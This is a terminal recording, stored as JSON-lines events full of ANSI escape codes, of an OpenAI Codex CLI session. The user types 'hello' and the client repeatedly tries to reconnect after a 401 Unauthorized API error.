{"delayMs":0,"data":"\u001b[?25l\u001b[32m\u001b[1m\u001b[Harkon@tnode\u001b(B\u001b[m:\u001b[34m\u001b[1m~/default/claudeman-predictive/tmp/codexrec-work-ruT16A\u001b(B\u001b[m$ exec codex\u001b[K\u001b[33m\r\n⚠ Codex could not find bubblewrap on PATH. Install bubblewrap with your OS package manager. See the\u001b[39m\u001b[K\r\n \u001b[33msandbox prerequisites: https://developers.openai.com/codex/concepts/sandboxing#prerequisites.\u001b[39m\u001b[K\r\n \u001b[33mCodex will use the bundled bubblewrap in the meantime.\u001b[39m\u001b[K\r\n\u001b[K\u001b[2m\r\n╭─────────────────────────────────────────────────╮\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ >_ \u001b(B\u001b[m\u001b[1mOpenAI Codex\u001b(B\u001b[m\u001b[2m (v0.147.0) │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ model: \u001b(B\u001b[mgpt-5.6-sol\u001b[2m \u001b(B\u001b[m\u001b[36m/model\u001b[39m\u001b[2m to change │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n│ directory: \u001b(B\u001b[m~/default/…/tmp/codexrec-work-ruT16A\u001b[2m │\u001b(B\u001b[m\u001b[K\u001b[2m\r\n╰─────────────────────────────────────────────────╯\u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n \u001b[1mTip:\u001b(B\u001b[m Our most capable model yet. GPT-5.6 Sol can tackle complex code changes, dig into research,\u001b[K\r\n produce polished documents, and take on your most ambitious work. Sol is highly capable at lower\u001b[K\r\n reasoning efforts—try starting lower, then turn it up for harder jobs.\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[1m\r\n›\u001b(B\u001b[m\u001b[1X\u001b[2m\u001b[CUse /skills to list available skills\u001b(B\u001b[m\u001b[K\r\n\u001b[K\u001b[20;2H\u001b[1K\u001b[38;5;223m\u001b[Cgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-ruT16A\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[18;3H"}
|
||||
{"keyAt":true,"data":"h"}
|
||||
{"delayMs":199,"data":"h\u001b[K\u001b[20;80H\u001b[K\u001b[18;4H"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"delayMs":40,"data":"e\u001b[K\u001b[20;80H\u001b[K\u001b[18;5H"}
|
||||
{"keyAt":true,"data":"l"}
|
||||
{"delayMs":40,"data":"l\u001b[K\u001b[20;80H\u001b[K\u001b[18;6H"}
|
||||
{"keyAt":true,"data":"l"}
|
||||
{"delayMs":40,"data":"l\u001b[K\u001b[20;80H\u001b[K\u001b[18;7H"}
|
||||
{"keyAt":true,"data":"o"}
|
||||
{"delayMs":40,"data":"o\u001b[K\u001b[20;80H\u001b[K\u001b[18;8H"}
|
||||
{"keyAt":true,"data":"\r"}
|
||||
{"delayMs":281,"data":"\u001b[16;30r\u001b[16;1H\u001bM\u001bM\u001bM\u001bM\u001b[1;30r\u001b[18;1H"}
|
||||
{"delayMs":0,"data":"\u001b[1m\u001b[2m› \u001b(B\u001b[mhello\r\n"}
|
||||
{"delayMs":0,"data":"\u001b[22;3H\u001b[2mUse /skills to list available skills\u001b(B\u001b[m\u001b[K\u001b[24;80H\u001b[K\u001b[22;3H"}
|
||||
{"delayMs":12,"data":"\u001b[36C\u001b[K\u001b[24;80H\u001b[K\u001b[22;3H"}
|
||||
{"delayMs":6,"data":"\u001b[36C\u001b[K\u001b[24;80H\u001b[K\u001b[22;3H"}
|
||||
{"delayMs":6,"data":"\u001b[36C\u001b[K\u001b[24;80H\u001b[K\u001b[22;3H"}
|
||||
{"delayMs":118,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":1,"data":"\r\n•\u001b[C\u001b[2mWorking\u001b[C(0s • esc to interrupt)\u001b[24;1H\u001b(B\u001b[m\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mUse /skills to list available skills\u001b[26;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-ruT16A\u001b[24;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":34,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[3AW\u001b[30C\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[21;1H\u001b[2m◦\u001b[C\u001b(B\u001b[m\u001b[1mW\u001b(B\u001b[mo\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;4H\u001b[1mo\u001b(B\u001b[mr\u001b[28C\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":32,"data":"\u001b[21;5H\u001b[1mr\u001b(B\u001b[mk\u001b[27C\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;6H\u001b[1mk\u001b(B\u001b[mi\u001b[26C\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;7H\u001b[1mi\u001b(B\u001b[mn\u001b[25C\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":34,"data":"\u001b[3AW\u001b[4C\u001b[1mn\u001b(B\u001b[mg\u001b[24C\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":32,"data":"\u001b[21;34H\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;12H\u001b[2m1\u001b(B\u001b[m\u001b[21C\u001b[K\u001b[24;39H\u001b[K\u001b[26;80H\u001b[K\u001b[24;3H"}
|
||||
{"delayMs":19,"data":"\u001b[21;1H\u001b[J\u001b[A\u001b[K"}
|
||||
{"delayMs":1,"data":"\r\n\u001b[2m◦\u001b[CReconne\u001b(B\u001b[mc\u001b[1mting.\u001b(B\u001b[m.\u001b[2m. 2/5\u001b[C(1s • esc to interrupt)\r\n └ Unexpected status 401 Unauthorized: {\r\n \"error\": {\r\n \"message\": \"Incorre, url: wss://api.openai.com/v1/responses, cf-ray: a2831cf59baa039d-ZRH,…\u001b[27;1H\u001b(B\u001b[m\u001b[1m›\u001b[C\u001b(B\u001b[m\u001b[2mUse /skills to list available skills\u001b[29;3H\u001b(B\u001b[m\u001b[38;5;223mgpt-5.6-sol default\u001b[39m\u001b[2m · \u001b(B\u001b[m\u001b[38;5;151m~/default/claudeman-predictive/tmp/codexrec-work-ruT16A\u001b[27;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":33,"data":"\u001b[21;10H\u001b[2mc\u001b(B\u001b[mt\u001b[4C\u001b[1m.\u001b(B\u001b[m.\u001b[28C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;11H\u001b[2mt\u001b(B\u001b[mi\u001b[4C\u001b[1m.\u001b(B\u001b[m \u001b[27C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;12H\u001b[2mi\u001b(B\u001b[mn\u001b[4C\u001b[1m \u001b(B\u001b[m2\u001b[26C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[21;1H•\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;13H\u001b[2mn\u001b(B\u001b[mg\u001b[4C\u001b[1m2\u001b(B\u001b[m/\u001b[25C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;14H\u001b[2mg\u001b(B\u001b[m.\u001b[4C\u001b[1m/\u001b(B\u001b[m5\u001b[24C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":36,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[?25l\u001b[?12l\u001b[?25h\u001b[27;3H"}
|
||||
{"delayMs":31,"data":"\u001b[21;15H\u001b[2m.\u001b(B\u001b[m.\u001b[4C\u001b[1m5\u001b(B\u001b[m\u001b[24C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":32,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;16H\u001b[2m.\u001b(B\u001b[m.\u001b[28C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;17H\u001b[2m.\u001b(B\u001b[m \u001b[27C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":32,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":35,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;18H\u001b[2m \u001b(B\u001b[m2\u001b[26C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;19H\u001b[2m2\u001b(B\u001b[m/\u001b[25C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;20H\u001b[2m/\u001b(B\u001b[m5\u001b[24C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":32,"data":"\u001b[21;21H\u001b[2m5\u001b(B\u001b[m\u001b[24C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[21;1H\u001b[2m◦\u001b[27;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":34,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":21,"data":"\u001b[21;19H\u001b[2m3\u001b(B\u001b[m\u001b[26C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;85H\u001b[2maca388822\u001b(B\u001b[m\u001b[6C\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;24H\u001b[2m2\u001b(B\u001b[m\u001b[21C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[6AR\u001b[42C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[21;1H•\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[6A\u001b[1mR\u001b(B\u001b[me\u001b[41C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":0,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":33,"data":"\u001b[21;4H\u001b[1me\u001b(B\u001b[mc\u001b[40C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":32,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;5H\u001b[1mc\u001b(B\u001b[mo\u001b[39C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;6H\u001b[1mo\u001b(B\u001b[mn\u001b[38C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;7H\u001b[1mn\u001b(B\u001b[mn\u001b[37C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[6AR\u001b[4C\u001b[1mn\u001b(B\u001b[me\u001b[36C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[6A\u001b[2mR\u001b(B\u001b[me\u001b[4C\u001b[1me\u001b(B\u001b[mc\u001b[35C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;4H\u001b[2me\u001b(B\u001b[mc\u001b[4C\u001b[1mc\u001b(B\u001b[mt\u001b[34C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;5H\u001b[2mc\u001b(B\u001b[mo\u001b[4C\u001b[1mt\u001b(B\u001b[mi\u001b[33C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;6H\u001b[2mo\u001b(B\u001b[mn\u001b[4C\u001b[1mi\u001b(B\u001b[mn\u001b[32C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":34,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
{"delayMs":0,"data":"\u001b[21;7H\u001b[2mn\u001b(B\u001b[mn\u001b[4C\u001b[1mn\u001b(B\u001b[mg\u001b[31C\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[27;3H"}
|
||||
{"delayMs":33,"data":"\u001b[21;46H\u001b[K\u001b[22;42H\u001b[K\u001b[23;17H\u001b[K\u001b[24;100H\u001b[K\u001b[27;39H\u001b[K\u001b[29;80H\u001b[K\u001b[21;1H\u001b[2m◦\u001b[6Cn\u001b(B\u001b[me\u001b[4C\u001b[1mg\u001b(B\u001b[m.\u001b[8C\u001b[2m3\u001b[27;3H\u001b(B\u001b[m"}
|
||||
{"delayMs":34,"data":"\u001b[?25l\u001b[?12l\u001b[?25h"}
|
||||
